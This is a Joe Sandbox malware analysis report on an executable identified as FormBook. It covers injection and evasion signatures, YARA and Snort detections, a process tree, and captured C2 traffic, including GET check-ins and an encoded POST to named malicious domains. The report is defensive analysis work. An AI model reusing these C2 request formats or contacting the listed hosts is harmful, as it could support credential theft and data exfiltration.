Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GJRX21GBj3.exe

Overview

General Information

Sample name:GJRX21GBj3.exe
renamed because original name is a hash value
Original sample name:04ca4f891cf5c2c412c58340ec0de521f940f4b36c1b0b7f1aa1fdae080922aa.exe
Analysis ID:1467022
MD5:804cc1b2769f38027fd2c2bf8141013b
SHA1:b75af1f4f65b7f12ba311c3c14c67642c0898fb8
SHA256:04ca4f891cf5c2c412c58340ec0de521f940f4b36c1b0b7f1aa1fdae080922aa
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • GJRX21GBj3.exe (PID: 4080 cmdline: "C:\Users\user\Desktop\GJRX21GBj3.exe" MD5: 804CC1B2769F38027FD2C2BF8141013B)
    • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 3792 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • ngen.exe (PID: 2568 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" MD5: 417D6EA61C097F8DF6FEF2A57F9692DF)
      • pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe (PID: 7120 cmdline: "C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • findstr.exe (PID: 2072 cmdline: "C:\Windows\SysWOW64\findstr.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe (PID: 5784 cmdline: "C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5328 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2abd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2abd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.ngen.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.ngen.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d2d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16912:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          4.2.ngen.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            4.2.ngen.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e0d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17712:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\GJRX21GBj3.exe", ParentImage: C:\Users\user\Desktop\GJRX21GBj3.exe, ParentProcessId: 4080, ParentProcessName: GJRX21GBj3.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 3792, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\GJRX21GBj3.exe", ParentImage: C:\Users\user\Desktop\GJRX21GBj3.exe, ParentProcessId: 4080, ParentProcessName: GJRX21GBj3.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 3792, ProcessName: svchost.exe

            Snort Signatures

            Timestamp:07/03/24-16:39:32.243675
            SID:2855465
            Source Port:49711
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.mybodyradar.net/nml2/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: GJRX21GBj3.exeReversingLabs: Detection: 68%
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: GJRX21GBj3.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: findstr.pdbGCTL source: ngen.exe, 00000004.00000002.2293830420.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924590936.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ngen.pdb source: findstr.exe, 00000007.00000002.3924355546.00000000031FE000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000003C7C000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000000.2360774678.00000000032FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2627811818.00000000286EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215505772.0000000000DFE000.00000002.00000001.01000000.00000005.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000000.2360491290.0000000000DFE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: ngen.exe, 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2296210633.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2294244319.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: findstr.pdb source: ngen.exe, 00000004.00000002.2293830420.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924590936.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ngen.exe, ngen.exe, 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, findstr.exe, 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2296210633.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2294244319.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02E5BF10 FindFirstFileW,FindNextFileW,FindClose,7_2_02E5BF10
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push rsi0_2_00007FF658600980
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push rbx0_2_00007FF658551988
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push rsi0_2_00007FF6586009D0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push rdi0_2_00007FF658600B00
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push rbx0_2_00007FF6585D2430
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push rsi0_2_00007FF6585D2430
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push rbx0_2_00007FF6585D2430
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push rbx0_2_00007FF6585D2430
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push rbx0_2_00007FF6585D2430
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push rbx0_2_00007FF6585D2430
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push rbx0_2_00007FF6585D2430
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push rbx0_2_00007FF6585D2430
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push rsi0_2_00007FF6585D2430
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push rdi0_2_00007FF6585D2430
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push r140_2_00007FF65865E3C0
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push rsi0_2_00007FF6585D2740
            Source: C:\Users\user\Desktop\GJRX21GBj3.exeCode function: 4x nop then push rbx0_2_00007FF658551988
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 4x nop then xor eax, eax7_2_02E49830
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 4x nop then pop edi7_2_02E524A9
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 4x nop then pop edi7_2_02E52487
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 4x nop then mov ebx, 00000004h7_2_03490548

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49711 -> 23.227.38.74:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.mg55aa.xyz
            Source: Joe Sandbox ViewIP Address: 43.155.26.241 43.155.26.241
            Source: Joe Sandbox ViewIP Address: 203.161.55.102 203.161.55.102
            Source: Joe Sandbox ViewIP Address: 108.179.193.98 108.179.193.98
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /c7rq/?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.valerieomage.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kosherphonestore.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /kwl6/?k06T=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.cwgehkk.storeConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /nml2/?k06T=HPoEs5HSsEYYnAW6PVozIACR+89TlHzFxT1N2ofTBBi/nJmbqmnSjRqVxPoNn0pwlxgNo3SmadBTH7enssKrgG8HFM9ue4Cv/jlK8Hwkml5mQyRFpKLBj5uVntz3S/FMqw==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mybodyradar.netConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /tb8p/?k06T=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiI6LSlbUKGOe5tpqy+YL001eRQtx2Jgk6C84cNpUHQ9eTwUQ==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.lacemalt.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2/UGXXDPdESA3G681NsEYfip50N0NMaShmTLM2x7hQcZfKg==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.siteblogoficialon.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /7npk/?rz=LZsl-bkp-XfXeRLp&k06T=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MOprHpEJhuLS8Xg3IfDdoqaVi1Ch1kdwH1TvR7mgJgyRVyQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mg55aa.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficDNS traffic detected: DNS query: www.gospelstudygroup.org
            Source: global trafficDNS traffic detected: DNS query: www.valerieomage.com
            Source: global trafficDNS traffic detected: DNS query: www.instantmailer.cloud
            Source: global trafficDNS traffic detected: DNS query: www.kosherphonestore.com
            Source: global trafficDNS traffic detected: DNS query: www.cwgehkk.store
            Source: global trafficDNS traffic detected: DNS query: www.mybodyradar.net
            Source: global trafficDNS traffic detected: DNS query: www.lacemalt.top
            Source: global trafficDNS traffic detected: DNS query: www.siteblogoficialon.com
            Source: global trafficDNS traffic detected: DNS query: www.mcxright.com
            Source: global trafficDNS traffic detected: DNS query: www.amkmos.online
            Source: global trafficDNS traffic detected: DNS query: www.mg55aa.xyz
            Source: global trafficDNS traffic detected: DNS query: www.lavillitadepapa.com
            Source: unknownHTTP traffic detected: POST /ktbm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.kosherphonestore.comOrigin: http://www.kosherphonestore.comReferer: http://www.kosherphonestore.com/ktbm/Content-Length: 205Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53Data Raw: 6b 30 36 54 3d 51 41 36 55 59 46 54 2b 5a 68 62 66 72 4b 62 46 6b 42 69 59 64 75 50 6f 34 2f 56 7a 48 6b 75 55 69 70 77 63 53 37 4e 4c 77 70 55 6b 45 51 41 2f 52 34 4f 6d 31 58 44 61 33 43 33 73 7a 76 44 6b 76 6c 43 6f 78 62 33 64 6c 79 7a 77 32 6f 69 6d 4d 31 71 50 50 64 32 65 48 63 2f 4f 31 66 77 74 77 61 6d 2f 67 52 71 7a 52 56 48 31 34 6d 4f 56 4f 6c 68 46 45 49 52 47 68 65 68 77 6b 38 4c 6d 4f 76 7a 70 78 38 4f 52 5a 58 41 69 35 50 4d 77 45 52 30 49 63 68 6c 71 30 50 41 6f 4e 50 76 2b 4d 34 31 46 52 5a 78 33 34 50 55 2b 57 46 78 43 7a 47 70 31 78 73 30 5a 52 59 59 50 30 4b 4e 4c 6a 36 4f 64 33 6b 59 3d Data Ascii: k06T=QA6UYFT+ZhbfrKbFkBiYduPo4/VzHkuUipwcS7NLwpUkEQA/R4Om1XDa3C3szvDkvlCoxb3dlyzw2oimM1qPPd2eHc/O1fwtwam/gRqzRVH14mOVOlhFEIRGhehwk8LmOvzpx8ORZXAi5PMwER0Ichlq0PAoNPv+M41FRZx34PU+WFxCzGp1xs0ZRYYP0KNLj6Od3kY=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 14:40:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 14:41:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
